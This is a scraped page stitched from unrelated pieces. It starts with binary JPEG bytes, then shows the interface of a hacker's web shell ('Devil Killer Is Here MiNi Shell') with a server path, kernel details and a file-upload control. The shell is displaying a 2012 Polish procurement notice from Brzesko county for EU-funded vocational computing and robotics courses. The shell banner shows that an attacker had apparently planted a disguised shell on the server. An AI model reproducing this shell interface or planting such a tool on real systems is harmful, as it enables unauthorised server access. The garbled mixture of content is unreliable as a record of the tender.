JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120316/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120316/61621-N-2012.html

<p class="kh_header"><b>Brzesko: Kursy informatyczne i elektroniczne w ramach projektu - Modernizacja  kształcenia zawodowego w Małopolsce</b><br>
<b>Numer ogłoszenia: 61621 - 2012; data zamieszczenia: 16.03.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Starostwo Powiatowe w Brzesku , ul. Głowackiego 51, 32-800 Brzesko, woj. małopolskie.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.powiatbrzeski.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Kursy informatyczne i elektroniczne w ramach projektu - Modernizacja  kształcenia zawodowego w Małopolsce.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest realizacja kursów zawodowych z  branży informatycznej i elektronicznej w szkołach ponadgimnazjalnych, dla których organem prowadzącym jest Powiat Brzeski współfinansowanych przez Unię Europejską w ramach Europejskiego Funduszu Społecznego w podziale na następujące zadania:

Zadanie 1:  Kurs programowania sterowników PLC dla uczniów grupy I w ZSP nr 2 w Brzesku.

Zadanie 2:  Kurs programowania sterowników PLC dla uczniów grupy II w ZSP nr 2 w Brzesku.

Zadanie 3: Kurs programowania robotów przemysłowych dla uczniów grupy I w ZSP nr 2 w Brzesku.

Zadanie 4: Kurs programowania robotów przemysłowych dla uczniów grupy II w ZSP nr 2 w Brzesku.

Zadanie 5: Kurs programowania robotów mobilnych dla uczniów grupy I ZSP nr 2 w Brzesku.

Zadanie 6: Kurs programowania robotów mobilnych dla uczniów grupy II ZSP nr 2 w Brzesku.

Zadanie 7: Kurs Komputerowe wspomaganie projektowania dla uczniów grupy I w ZSP nr 2 w Brzesku.

Zadanie 8: Kurs Komputerowe wspomaganie projektowania dla uczniów grupy II w ZSP nr 2 w Brzesku.

Zadanie 9: Kurs grafika komputerowa dla uczniów  grupy I w ZSP nr 2 w Brzesku.

Zadanie 10: Kurs grafika komputerowa dla uczniów  grupy II w ZSP nr 2 w Brzesku.

Zadania 11: Kurs PHP + MYSQL - tworzenie internetowych  aplikacji bazodanowych  dla uczniów ZSP nr 2 w Brzesku.

Zadania 12: Kurs Administracja serwerem internetowym z systemem Linux  dla uczniów ZSP nr 2 w Brzesku.

Zadania 13: Kurs obsługi nowoczesnych  urządzeń multimedialnych dla uczniów ZSP nr 1 w Brzesku.

Zadanie 14: Kurs Obróbka zdjęć cyfrowych i materiału video dla uczniów ZSP nr 1 w Brzesku.

Zadanie 15: Kurs Obróbka zdjęć cyfrowych i materiału video dla uczniów ZS w Szczurowej.


Szczegółową specyfikację każdego kursu zawarto w załączniku nr 1 do Specyfikacji Istotnych Warunków Zamówienia (Opis przedmiotu zamówienia).

Kursy realizowane są w ramach projektu - Modernizacja kształcenia zawodowego w Małopolsce, współfinansowanego przez Unię Europejską w ramach Europejskiego Funduszu Społecznego.

2. Szczegółowe wymagania Zamawiającego wobec Wykonawcy w ramach realizacji niniejszego zamówienia:

1) Zamawiający dopuszcza składanie ofert częściowych w podziale na w/w Zadania. Szczegółowy opis poszczególnych części zamówienia zawarto w załączniku nr 1 do SIWZ.

2) Zamawiający dopuszcza możliwość realizacji części zamówienia przez podwykonawcę.

3) W ciągu 7 dni od dnia podpisania umowy, ale nie później niż dzień przed faktycznym rozpoczęciem realizacji kursu Wykonawca będzie zobligowany przekazać do Zamawiającego planowany harmonogram spotkań zawierający daty i godziny prowadzonych zajęć wraz z tematami rozpisanymi zgodnie z tematyką kursu. Szczegółowy harmonogram realizacji kursu musi być uzgodniony z liderem szkolnym projektu właściwym dla każdego zadania (zaparafowany) i podpisany przez właściwego Dyrektora Szkoły.

4) Zamawiający wymaga aby szkolenia planowane były zgodnie z wytycznymi określonymi w załączniku nr 1 do SIWZ.

5) Jeśli w załączniku nr 1 do określenia długości kursu użyto terminu -godzina- to należy przyjąć, iż jedna godzina jest równa 60 minutom, jeśli zaś długość opisano z użyciem -godziny lekcyjnej- to należy przyjąć iż jedna godzina lekcyjna jest równa 45 minutom.

6) Sale i pracownie przewidziane na realizację kursu w danej szkole udostępnia się Wykonawcy nieodpłatnie jak w załączniku nr 1 do SIWZ.

7) Wykonawca może w trakcie przeprowadzania kursu korzystać z pomocy dydaktycznych będących własnością szkoły wyszczególnionych w specyfikacji - w załączniku nr 1 do SIWZ, przy czym odpowiada on za wszelkie uszkodzenia powstałe na wskutek niewłaściwego ich użytkowania. Dyrektor lub osoba przez niego upoważniona udostępnia sprzęt oraz dokonuje sprawdzenia jego stanu w obecności Wykonawcy każdorazowo przed rozpoczęciem i po zakończeniu kursu. Pozostały sprzęt niezbędny do realizacji zadania Wykonawca musi zorganizować na swój koszt.

8) Jeżeli w załączniku nr 1 do SIWZ (opis przedmiotu zamówienia) wymaga się od Wykonawcy przekazania uczestnikom kursu materiałów szkoleniowych, dydaktycznych, biurowych oraz wszelkich innych produktów to wszystkie one muszą być nowe, nieużywane i oryginalnie zapakowane.

9) Wykonawca zobowiązuje się do bieżącego informowania Zamawiającego faksem, e-mailem lub pisemnie (najpóźniej w drugim dniu roboczym po zajęciach) o każdej nieobecności uczestnika na danym kursie.

10) Wykonawca jest zobowiązany prowadzić odpowiednią dokumentację w postaci:  dziennika zajęć (wzór zgodny z Rozporządzeniem Ministra Edukacji Narodowej i Sportu z dnia 19 lutego 2002 r. w sprawie sposobu prowadzenia przez publiczne przedszkola, szkoły i placówki dokumentacji przebiegu nauczania, działalności wychowawczej i opiekuńczej oraz rodzajów tej dokumentacji (Dz. U.  nr 23, poz. 225, z późn. zm.)), listy obecności z własnoręcznymi podpisami uczestników w każdym dniu szkolenia i podpisaną przez prowadzącego zajęcia (wzór listy obecności zostanie przekazany Wykonawcy przez właściwego lidera szkolnego po podpisaniu umowy na realizację kursu), listy przekazanych posiłków, materiałów biurowych, szkoleniowych/skryptów oraz wszelkich innych dokumentów i pomocy jeśli wymaga tego specyfikacja kursu określona szczegółowo w załączniku nr 1 do SIWZ, a także listy odbioru wydanych zaświadczeń/certyfikatów. Sporządzając listy przekazania uczniom wszelkich zaświadczeń, certyfikatów przedmiotów czy produktów (w tym wyżywienia) Wykonawca musi uzyskać podpis każdego ucznia potwierdzający jego faktyczny odbiór. Brak takiego podpisu jest dla Zamawiającego równoznaczny z nieprzekazaniem przedmiotu o którym mowa wyżej.

11) Wykonawca po zakończeniu kursu przeprowadzi wśród uczestników kursu ocenę merytoryczną i techniczną  przebiegu kursu na podstawie anonimowej ankiety oceniającej. 

12) Wykonawca zapewni ubezpieczenie wszystkich uczestników kursów od następstw nieszczęśliwych wypadków (każda osoba musi być ubezpieczona na kwotę min. 10.000 zł na okres trwania kursu). Wykonawca musi posiadać polisę potwierdzającą objęcie uczestników takim ubezpieczeniem oraz przedstawić jej kserokopię najpóźniej w dniu rozpoczęcia kursu.

13) W ramach promocji przedmiotu umowy Wykonawca zobowiązany jest także do: 
a) oznakowania sal, w których będą odbywały się zajęcia, zgodnie z Wytycznymi dotyczącymi oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki,
b) informowania uczestników kursu o fakcie współfinansowania zajęć ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego,
c) stosowania na wszystkich dokumentach w trakcie wykonywania przedmiotowego zamówienia znaków takich jak: logo POKL, logo Unii Europejskiej wraz z odwołaniem do Unii Europejskiej i Europejskiego Funduszu Społecznego, logo Województwa Małopolskiego, logo projektu, logo powiatu brzeskiego, hasło promocyjne POKL.  

14) W przypadku niemożliwości ukończenia kursu przez uczestnika z przyczyny leżącej po jego stronie (tj. długotrwałej choroby, śmierci lub dobrowolnej rezygnacji) Wykonawca zamiast zaświadczeń/certyfikatów o ukończeniu kursu, o których mowa punkcie 15 przekaże Zamawiającemu stosowne oświadczenie ze wskazaniem powodu przerwania kursu danego uczestnika.

15) CERTYFIKATY i ZAŚWIADCZENIA dla kursów:
Każdy z uczestników zajęć (posiadający min 80% obecności) otrzyma zaświadczenie / certyfikat potwierdzający ukończenie kursu. Na zaświadczeniu, certyfikacie winny zostać umieszczone: szczegółowy zakres programowy kursu (wraz z podaniem liczby godzin poszczególnych tematów zajęć), logo projektu - wg wzoru przekazanego przez Lidera szkolnego na etapie realizacji zamówienia oraz zapis właściwy dla nazwy kursu występujący w nazwie każdego zadania 
tj.: np. dla Zadania 1: Kurs programowania sterowników PLC dla uczniów grupy I w ZSP nr 2 w Brzesku, będzie to sentencja:
,,Kurs programowania sterowników PLC współfinansowany przez Unię Europejską 
z Europejskiego Funduszu Społecznego w ramach projektu pn. Modernizacja kształcenia zawodowego w Małopolsce,,.


16) CATERING dla kursów:
a) dla wszystkich zadań Wykonawca zapewni na każde zajęcia, dla każdego uczestnika kursu conajmniej jeden gorący posiłek (o masie min. 200 g.) / na osobę oraz ciepłą herbatę i kawę.  Posiłki muszą być wyporcjowane oraz zostać zaserwowane w pierwszej połowie zajęć.
Wszystkie posiłki muszą być świeże i przygotowane zgodnie z zachowaniem obowiązujących przepisów dot. higieny żywienia i żywności.

Na okres spożywania posiłku Zamawiający zapewni dodatkowe pomieszczenie do tego celu.

17) W salach i pracowniach, podczas prowadzenia zajęć bez zgody koordynatora powiatowego nie mogą  przebywać inne osoby niż uczestnicy kursu oraz osoby szkolące (instruktorzy, wykładowcy).

18) Jeśli w opisie przedmiotu zamówienia - załącznik nr 1 do SIWZ określono podział na grupy to kurs musi zostać przeprowadzony dla każdej grupy oddzielnie i niedopuszczalne jest łączenie grup celem prowadzenia wspólnych zajęć.

19) Zamawiający zastrzega sobie prawo do pełnej kontroli przeprowadzanych zajęć, w tym także do sporządzania zdjęć oraz wszelkiej dokumentacji obrazującej realizację przedmiotu umowy.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 15.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> .</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.powiatbrzeski.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Brzesku
Wydział Edukacji (I p., pok. 102) 
ul. Piastowska 2
32-800 Brzesko.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.03.2012 godzina 09:00, miejsce: Starostwo Powiatowe w Brzesku
Sekretariat ( II p. , pok. 213)
ul. Głowackiego 51
32-800 Brzesko.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt: Modernizacja kształcenia zawodowego w Małopolsce. Projekt w ramach Programu Operacyjnego Kapitał Ludzki, Działanie 9.2, współfinansowany przez Unię Europejską ze środków Europejskiego Funduszu Społecznego.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie 1:  Kurs programowania sterowników PLC dla uczniów grupy I w ZSP nr 2 w Brzesku..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Liczba uczestników zajęć - 15 uczniów
2. Czas trwania kursu wynosi:  60 godzin 
3. Kurs musi uwzględniać między innymi: poznanie architektury i możliwości sprzętowych sterowników PLC firmy Moeller serii EASY 800 i Siemens S-300, zaznajomienie się z oprogramowaniem narzędziowym EasySoftPro oraz STEP7 i praktyczną realizacją układów sterowania modelami obiektów spotykanymi w rzeczywistości. Materiał powinien być realizowany metodami aktywizującymi w formie ćwiczeń w grupach ćwiczeniowych nie większych niż 2 uczniów.
4. Zamawiający zapewnia: Pracownia mechatroniki, rzutnik + komputer (x1)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 13.07.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie 2:  Kurs programowania sterowników PLC dla uczniów grupy II w ZSP nr 2 w Brzesku..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Liczba uczestników zajęć - 15 uczniów
2.	Czas trwania kursu wynosi:  60 godzin 
3.	Kurs musi uwzględniać co najmniej poznanie architektury i możliwości sprzętowych sterowników PLC firmy Moeller serii EASY 800 i Siemens S-300, zaznajomienie się z oprogramowaniem narzędziowym EasySoftPro oraz STEP7 i praktyczną realizacją układów sterowania modelami obiektów spotykanymi w rzeczywistości. Materiał powinien być realizowany metodami aktywizującymi w formie ćwiczeń w grupach ćwiczeniowych nie większych niż 2 uczniów.
4. Zamawiający zapewnia: Pracownia mechatroniki, rzutnik + komputer (x1)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zadanie 3: Kurs programowania robotów przemysłowych dla uczniów grupy I w ZSP nr 2 w Brzesku..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Liczba uczestników kursu - 15 uczniów
2. Czas trwania kursu wynosi: 40 godzin
3. Kurs  pozwala na poznanie sprzętowych możliwości robotów przemysłowych Kawasaki oraz nabycie umiejętności ich obsługi i programowania. Materiał powinien być realizowany metodami aktywizującymi w formie ćwiczeń.
4. 6.	Zamawiający zapewnia: Pracownię mechatroniki, 1 x robot kawasaki z oprzyrządowaniem, 6x stanowiska komputerowe z oprogramowaniem symulacyjnym, 1x rzutnik z komputerem.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 29.06.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zadanie 4: Kurs programowania robotów przemysłowych dla uczniów grupy II w ZSP nr 2 w Brzesku..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Liczba uczestników kursu - 15 uczniów
2. Czas trwania kursu wynosi: 40 godzin 
3. Kurs  pozwala na poznanie sprzętowych możliwości robotów przemysłowych Kawasaki oraz nabycie umiejętności ich obsługi i programowania. Materiał powinien być realizowany metodami aktywizującymi w formie ćwiczeń.
4. Zamawiający zapewnia: Pracownię mechatroniki, 1 x robot kawasaki z oprzyrządowaniem, 6x stanowiska komputerowe z oprogramowaniem symulacyjnym, 1x rzutnik z komputerem.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Zadanie 5: Kurs programowania robotów mobilnych dla uczniów grupy I ZSP nr 2 w Brzesku..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Liczba uczestników kursu - 15 uczniów 
2. Czas trwania kursu wynosi: 30 godzin 
3. Kurs pozwala na zaznajomienie uczestników z podstawami projektowania robotów mobilnych na przykładzie zestawu Lego Mindstorms Robot ze szczególnym uwzględnieniem: konfiguracji kinematycznych, rodzajów napędów robotów, programowania sterownika i komunikacji robota z otoczeniem. Materiał powinien być realizowany metodami aktywizującymi w formie ćwiczeń w grupach ćwiczeniowych nie większych niż 2 uczniów. 
4. Zamawiający zapewnia: Pracownię mechatroniki,  5x komplet klocków MINDSTORM LEGO (roboty mobilne), 1x rzutnik z komputerem..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 29.06.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Zadanie 6: Kurs programowania robotów mobilnych dla uczniów grupy II ZSP nr 2 w Brzesku..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Liczba uczestników kursu - 15 uczniów 
2. Czas trwania kursu wynosi: 30 godzin 
3. Kurs pozwala na zaznajomienie uczestników z podstawami projektowania robotów mobilnych na przykładzie zestawu Lego Mindstorms Robot ze szczególnym uwzględnieniem: konfiguracji kinematycznych, rodzajów napędów robotów, programowania sterownika i komunikacji robota z otoczeniem. Materiał powinien być realizowany metodami aktywizującymi w formie ćwiczeń w grupach ćwiczeniowych nie większych niż 2 uczniów. 
4. Zamawiający zapewnia: Pracownię mechatroniki,  5x komplet klocków MINDSTORM LEGO (roboty mobilne), 1x rzutnik z komputerem..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Zadanie 7: Kurs Komputerowe wspomaganie projektowania dla uczniów grupy I w ZSP nr 2 w Brzesku..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Liczba uczestników zajęć - 10 uczniów
2. Czas trwania kursu wynosi:  40 godzin 
3. Program kursu powinien obejmować przynajmniej zagadnienia umożliwiające nabycie umiejętności sprawnego posługiwania się programem RM-Win w zakresie: tworzenia przekrojów stalowych, żelbetowych, drewnianych, tworzenia  schematu konstrukcji, zestawienia obciążeń, analizowania naprężeń, sił przekrojowych,  reakcji podporowych, projektowania prętów  stalowych, żelbetowych i drewnianych.
4.Zajęcia powinny być prowadzone metodami aktywizującymi w formie ćwiczeń praktycznych. Zajęcia odbywać się będą w sali wyposażonej w minimum 10 stanowisk komputerowych po jednym dla każdego uczestnika z zainstalowanym oprogramowaniem umożliwiającym realizację celów kursu. 
5. Zamawiający zapewnia: salę lekcyjną, 1x rzutnik z komputerem.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 29.06.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Zadanie 8: Kurs Komputerowe wspomaganie projektowania dla uczniów grupy II w ZSP nr 2 w Brzesku..</p>
